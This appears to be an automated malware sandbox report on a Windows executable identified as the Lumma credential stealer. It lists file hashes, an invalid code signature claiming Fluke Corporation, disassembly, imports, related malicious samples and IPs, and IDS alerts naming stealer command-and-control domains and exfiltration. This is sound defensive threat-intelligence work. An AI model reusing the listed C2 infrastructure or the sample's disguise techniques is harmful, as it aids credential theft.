                                                                                                                                                                                                                          https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.18.69.40
                                                                                                                                                                                                                          AKAMAI-ASUSfile_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                          Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.45.0.233
                                                                                                                                                                                                                          NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.49.251.7
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.57.90.149
                                                                                                                                                                                                                          malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.34.86
                                                                                                                                                                                                                          Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.44.181.15
                                                                                                                                                                                                                          Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 95.101.191.171
                                                                                                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 104.76.15.30
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No created / dropped files found
                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.390937610699197
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                          File name:BnJxmraqlk.exe
                                                                                                                                                                                                                          File size:3'972'448 bytes
                                                                                                                                                                                                                          MD5:356bde316f31cfc2ed244a7cdd359617
                                                                                                                                                                                                                          SHA1:8bbf194502f5d3a15ebb6ab28d37ec2fe47f22a4
                                                                                                                                                                                                                          SHA256:f37b1604055cfa1d70ea439f2b38cb72a2da74bf6bba76b2e080e16146a53a5e
                                                                                                                                                                                                                          SHA512:a2798b679fd0c292a8511e4675c8bcf94559a8779d1ed32bc87271180dcf227fd2c8a272f02a8e665e079aaf1a467ae0369cb04b59075ff5af0904857745657c
                                                                                                                                                                                                                          SSDEEP:98304:8QqQVFO4nrifgr2q7ZM4G3Ikgm3QZE6HpnoS0:8SVlChq7ZLkqTHpnI
                                                                                                                                                                                                                          TLSH:1E06D02062919132F4B309754E7DA56E5558BF2D0729A0DB6BCCBD0F6EB2CD3AC31623
                                                                                                                                                                                                                          File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......].(#..Fp..Fp..Fp...p..Fp...p..Fp...p..Fp...p..Fp...p..Fp...p..FpK.Bq?.FpK.Eq..FpK.Cq..Fp..Bq..Fp..Cq..Fp...p .Fp..Gp..Fp..Oq..F
                                                                                                                                                                                                                          Icon Hash:090e9f4926060628
                                                                                                                                                                                                                          Entrypoint:0x4b3172
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                                                                                          Time Stamp:0x6568A5C6 [Thu Nov 30 15:09:58 2023 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                                                          Import Hash:15fc4206176b296b631cb2e01986237f
                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                          • 01/09/2022 02:00:00 01/09/2025 01:59:59
                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                          • CN=Fluke Corporation, O=Fluke Corporation, S=Washington, C=US
                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                          Thumbprint MD5:B75DE427E0EA4E6B3B95C02AA13899E3
                                                                                                                                                                                                                          Thumbprint SHA-1:CB5672B1690287612DD667CC32F597FC9373CEF5
                                                                                                                                                                                                                          Thumbprint SHA-256:E828776B6FBEC0BD0E09A28E8EC84B720EED7B5BA1F0FA0DA72FFE7BA4372472
                                                                                                                                                                                                                          Serial:00BF83314740E574401A4602E8D0E8028D
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          call 00007FB871185212h
                                                                                                                                                                                                                          jmp 00007FB8711841EFh
                                                                                                                                                                                                                          cmp ecx, dword ptr [005C4B80h]
                                                                                                                                                                                                                          jne 00007FB871184375h
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          jmp 00007FB8711848FDh
                                                                                                                                                                                                                          call 00007FB8711843B4h
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          call 00007FB8711846C9h
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                          je 00007FB871184380h
                                                                                                                                                                                                                          push 004B32C0h
                                                                                                                                                                                                                          call 00007FB871184873h
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push 00000007h
                                                                                                                                                                                                                          call 00007FB87118528Ch
                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          mov eax, dword ptr [005C4B80h]
                                                                                                                                                                                                                          and eax, 1Fh
                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                          ror eax, cl
                                                                                                                                                                                                                          xor eax, dword ptr [005C4B80h]
                                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          push FFFFFFFFh
                                                                                                                                                                                                                          push 004F8300h
                                                                                                                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                          mov eax, dword ptr [005C4B80h]
                                                                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                          push 00000FA0h
                                                                                                                                                                                                                          push 005CEA24h
                                                                                                                                                                                                                          call dword ptr [00586464h]
                                                                                                                                                                                                                          push 00595ED8h
                                                                                                                                                                                                                          call dword ptr [005863ECh]
                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                          test esi, esi
                                                                                                                                                                                                                          jne 00007FB871184387h
                                                                                                                                                                                                                          push 005AC7B8h
                                                                                                                                                                                                                          call dword ptr [005863ECh]
                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                          test esi, esi
                                                                                                                                                                                                                          je 00007FB871184402h
                                                                                                                                                                                                                          push 00595F1Ch
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          call dword ptr [00586430h]
                                                                                                                                                                                                                          push 00000038h
                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1c03d00x1f4.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d00000x81cf4.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x3c71a00x2bc0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2520000xb728.reloc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x1ad1a00x70.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x1ad2b00x18.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1860000x844.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                          .text0x10000x1848400x184a009855412e2da264f2ab217cc995a9370fFalse0.6110416582904471data7.07184336786379IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rdata0x1860000x3d34e0x3d4000f6839b2e310a00d3b54a395757d77c3False0.339827806122449data4.686746351783192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .data0x1c40000xbd5c0x4c00e3ad00e9c5cf7936e43588c6735515d3False0.22353001644736842data4.67130238797671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .rsrc0x1d00000x81cf40x81e0057611b6f3419cd5cde74553310089d51False0.20583192974013476data4.678111691894073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .reloc0x2520000xb7280xb80078b59315d75600e036874c51a9265fd7False0.6608780570652174data6.652317513828573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          pbpvjmsi0x25e0000x10e10x2004bf092a2827a83dffa0f6f4390a9b896False1.021484375data7.534238661608481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                          DAT0x1d03f00x32516PC bitmap, Windows 3.x format, 501 x 137 x 24, image size 206048, resolution 3780 x 3780 px/m, cbSize 206102, bits offset 54EnglishGreat Britain0.1584409661235699
                                                                                                                                                                                                                          DAT0x2029080x322f4PC bitmap, Windows 3.x format, 500 x 137 x 24, image size 205502, resolution 2834 x 2834 px/m, cbSize 205556, bits offset 54EnglishGreat Britain0.2518632392146179
                                                                                                                                                                                                                          RT_ICON0x234bfc0x2d03PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9866354248025688
                                                                                                                                                                                                                          RT_ICON0x2379000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.06286229740920384
                                                                                                                                                                                                                          RT_ICON0x2481280x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1115375531412376
                                                                                                                                                                                                                          RT_ICON0x24c3500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.1754149377593361
                                                                                                                                                                                                                          RT_ICON0x24e8f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2150562851782364
                                                                                                                                                                                                                          RT_ICON0x24f9a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3155737704918033
                                                                                                                                                                                                                          RT_ICON0x2503280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.48138297872340424
                                                                                                                                                                                                                          RT_STRING0x2507900x702dataEnglishGreat Britain0.2842809364548495
                                                                                                                                                                                                                          RT_STRING0x250e940x36adataEnglishGreat Britain0.2494279176201373
                                                                                                                                                                                                                          RT_STRING0x2512000x1e2dataEnglishGreat Britain0.45643153526970953
                                                                                                                                                                                                                          RT_STRING0x2513e40x68dataEnglishGreat Britain0.7403846153846154
                                                                                                                                                                                                                          RT_STRING0x25144c0x15cdataEnglishGreat Britain0.5689655172413793
                                                                                                                                                                                                                          RT_STRING0x2515a80x1b0dataEnglishGreat Britain0.49074074074074076
                                                                                                                                                                                                                          RT_STRING0x2517580x1b8dataEnglishGreat Britain0.5227272727272727
                                                                                                                                                                                                                          RT_GROUP_ICON0x2519100x68dataEnglishUnited States0.75
                                                                                                                                                                                                                          RT_VERSION0x2519780x37cdataEnglishUnited States0.46300448430493274
                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                                                                                          MPR.dllWNetAddConnection3W, WNetCancelConnection2W, WNetGetConnectionW, WNetOpenEnumW, WNetGetUserW, WNetGetUniversalNameW, WNetCloseEnum, WNetEnumResourceW
                                                                                                                                                                                                                          KERNEL32.dlllstrcmpA, EnterCriticalSection, LeaveCriticalSection, EncodePointer, GlobalDeleteAtom, lstrcmpW, CompareStringW, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalReAlloc, SetThreadPriority, GlobalFlags, VirtualProtect, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, UnregisterWaitEx, QueryDepthSList, InterlockedPopEntrySList, LoadLibraryA, GetFileTime, GetFileAttributesExW, FileTimeToLocalFileTime, UnlockFile, SetEndOfFile, LockFile, OutputDebugStringW, GetStringTypeW, SwitchToThread, GetExitCodeThread, TryEnterCriticalSection, GetCPInfo, LCMapStringW, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetFileType, GetModuleHandleExW, GetFullPathNameW, GetFileSize, GlobalUnlock, GlobalLock, GetModuleHandleA, LoadLibraryExW, WriteConsoleW, SetStdHandle, ExitThread, FreeLibraryAndExitThread, HeapQueryInformation, GetCommandLineA, IsValidLocale, EnumSystemLocalesW, IsValidCodePage, GetOEMCP, GetTimeZoneInformation, GetConsoleMode, ReadConsoleW, GetConsoleCP, FindFirstFileExW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SystemTimeToFileTime, CreateEventW, SetEvent, OpenEventW, SetUnhandledExceptionFilter, ExitProcess, FindResourceExW, SetFilePointer, SetNamedPipeHandleState, WaitNamedPipeW, TransactNamedPipe, GetCurrentThreadId, TerminateProcess, GetStdHandle, DuplicateHandle, ExpandEnvironmentStringsW, VirtualFree, VirtualAlloc, OutputDebugStringA, CreateSemaphoreW, WaitForMultipleObjects, ReleaseSemaphore, GetTempFileNameW, GlobalFindAtomW, GlobalAddAtomW, MoveFileExW, GetSystemTime, GetLocalTime, GetACP, GetSystemDefaultLCID, GetLocaleInfoA, GetTempPathW, DeleteVolumeMountPointW, SetVolumeMountPointW, FindVolumeMountPointClose, FindNextVolumeMountPointW, FindFirstVolumeMountPointW, CopyFileW, DeleteFileW, CompareFileTime, WriteFile, TerminateThread, CreateThread, OpenProcess, GetProcessTimes, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetUserDefaultLCID, GetUserDefaultUILanguage, SetThreadLocale, GetThreadLocale, EnumDateFormatsExW, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetVolumePathNamesForVolumeNameW, GetVolumeNameForVolumeMountPointW, FindVolumeClose, FindNextVolumeW, FindFirstVolumeW, GetVersionExW, DnsHostnameToComputerNameW, GetComputerNameExW, CreateTimerQueue, SignalObjectAndWait, GetThreadPriority, GetLogicalProcessorInformation, SetPriorityClass, GetVolumeInformationW, MoveFileW, FindNextFileW, FindFirstFileW, GetFileAttributesW, SetFileAttributesW, QueryDosDeviceW, RemoveDirectoryW, CreateDirectoryW, GetDiskFreeSpaceExW, GetWindowsDirectoryW, GetDriveTypeW, GetModuleHandleW, LoadLibraryW, CreateMutexW, FormatMessageW, GetTickCount, FindClose, SetFilePointerEx, DeviceIoControl, FlushFileBuffers, ReadFile, GetFileSizeEx, Sleep, SetThreadExecutionState, GetCurrentThread, LocalAlloc, GlobalFree, GlobalAlloc, GetProcAddress, FreeLibrary, lstrlenW, CreateFileW, GetSystemDirectoryW, GetProcessHeap, DeleteCriticalSection, HeapDestroy, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, HeapFree, FreeConsole, AttachConsole, VerSetConditionMask, VerifyVersionInfoW, GetVersion, GetModuleFileNameW, GetCommandLineW, GetExitCodeProcess, WaitForSingleObject, ResumeThread, CreateProcessW, GetCurrentProcessId, ProcessIdToSessionId, SetLastError, CloseHandle, GetCurrentProcess, FindResourceW, LoadResource, LockResource, SizeofResource, LocalFree, GetLastError, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes
                                                                                                                                                                                                                          USER32.dllSetWindowsHookExW, GetLastActivePopup, GetTopWindow, GetClassNameW, GetClassLongW, SetWindowLongW, PtInRect, CopyRect, GetSysColor, MapWindowPoints, ScreenToClient, AdjustWindowRectEx, GetWindowRect, RemovePropW, GetPropW, SetPropW, RedrawWindow, ValidateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetMenu, LoadIconW, WinHelpW, MonitorFromWindow, GetMonitorInfoW, EnableWindow, GetCapture, GetKeyState, GetFocus, GetDlgCtrlID, IsWindowEnabled, SetWindowTextW, GetDC, ReleaseDC, GetSysColorBrush, LoadCursorW, GetWindowThreadProcessId, DrawTextW, DrawTextExW, CallNextHookEx, TranslateMessage, DispatchMessageW, PeekMessageW, SendMessageTimeoutW, GetActiveWindow, MsgWaitForMultipleObjectsEx, LoadStringW, SystemParametersInfoW, GetDlgItem, IsIconic, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPos, DestroyWindow, IsMenu, IsWindow, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, PostMessageW, GetMessageTime, GetMessagePos, RegisterWindowMessageW, GetWindow, GrayStringW, TabbedTextOutW, ClientToScreen, RealChildWindowFromPoint, DestroyMenu, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapW, PostQuitMessage, GetMenuItemCount, GetMenuItemInfoW, SetMenuItemInfoW, GetWindowLongW, GetWindowTextW, GetScrollPos, SendMessageW, GetSystemMetrics, CharUpperW, UnhookWindowsHookEx, GetMenuItemID, GetSubMenu, GetParent, OffsetRect, SetRectEmpty, GetMenu, GetClientRect, MessageBoxW
                                                                                                                                                                                                                          GDI32.dllScaleWindowExtEx, ScaleViewportExtEx, OffsetViewportOrgEx, SetWindowExtEx, SetViewportOrgEx, SetViewportExtEx, ExtTextOutW, TextOutW, GetDeviceCaps, SetBkColor, SetTextColor, CreateBitmap, SetMapMode, DeleteDC, DeleteObject, Escape, GetClipBox, GetStockObject, PtVisible, RectVisible, RestoreDC, SaveDC, SelectObject
                                                                                                                                                                                                                          WINSPOOL.DRVOpenPrinterW, ClosePrinter, DocumentPropertiesW
                                                                                                                                                                                                                          ADVAPI32.dllRegisterEventSourceW, GetTokenInformation, OpenProcessToken, CryptAcquireContextW, CryptReleaseContext, CryptGetHashParam, CryptCreateHash, CryptHashData, CryptDestroyHash, RegCloseKey, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryInfoKeyW, EqualSid, CheckTokenMembership, LogonUserW, ImpersonateAnonymousToken, ImpersonateLoggedOnUser, SetThreadToken, RevertToSelf, ConvertStringSidToSidW, ReportEventW, ConvertSidToStringSidW, DeregisterEventSource, ConvertStringSecurityDescriptorToSecurityDescriptorW, SetNamedSecurityInfoW, SetEntriesInAclW, StartServiceW, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, RegUnLoadKeyW, RegLoadKeyW, LookupPrivilegeValueW, LookupAccountSidW, FreeSid, AllocateAndInitializeSid, AdjustTokenPrivileges, OpenThreadToken, RegSetValueExW, RegQueryValueExW
                                                                                                                                                                                                                          SHELL32.dllSHGetMalloc, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHChangeNotify, SHFileOperationW, SHCreateDirectoryExW, SHGetFolderPathW, ShellExecuteExW
                                                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                                                          SHLWAPI.dllPathAppendW, PathFileExistsW, PathFindExtensionW, PathMatchSpecW, PathIsUNCW, PathStripToRootW, UrlUnescapeW, PathFindFileNameW, PathIsNetworkPathW
                                                                                                                                                                                                                          ole32.dllCoInitialize, StringFromGUID2, CLSIDFromString, CoCreateInstance, CoUninitialize
                                                                                                                                                                                                                          OLEAUT32.dllVariantChangeType, SysFreeString, SafeArrayGetUBound, SafeArrayAccessData, SafeArrayUnaccessData, GetErrorInfo, VariantTimeToSystemTime, SysAllocString, VariantInit, VariantClear
                                                                                                                                                                                                                          CRYPT32.dllCryptMsgClose, CryptMsgGetParam, CertCloseStore, CertFindCertificateInStore, CertFreeCertificateContext, CryptHashCertificate, CertGetNameStringW, CryptQueryObject
                                                                                                                                                                                                                          ntdll.dllNtCreateFile, NtClose, RtlInitUnicodeString
                                                                                                                                                                                                                          OLEACC.dllLresultFromObject, CreateStdAccessibleObject
                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                          EnglishGreat Britain
                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                          Download Network PCAP: filteredfull

                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                          2025-01-07T13:17:02.077301+01002058616ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)1192.168.2.6505531.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.089336+01002058598ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)1192.168.2.6525201.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.101884+01002058632ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)1192.168.2.6494491.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.114724+01002058610ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)1192.168.2.6560541.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.126175+01002058628ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)1192.168.2.6641591.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.138060+01002058618ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)1192.168.2.6546151.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.146376+01002058622ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)1192.168.2.6647871.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.161242+01002058606ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)1192.168.2.6593471.1.1.153UDP
                                                                                                                                                                                                                          2025-01-07T13:17:02.830202+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.102.49.254443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:03.368085+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649713104.102.49.254443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:04.008393+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:04.333555+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649714104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:04.333555+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649714104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:04.851469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:05.326910+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649716104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:05.326910+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649716104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:06.110725+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649722104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:10.766967+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649722104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:11.453443+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649758104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:12.721069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649767104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:14.473566+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649783104.21.48.1443TCP
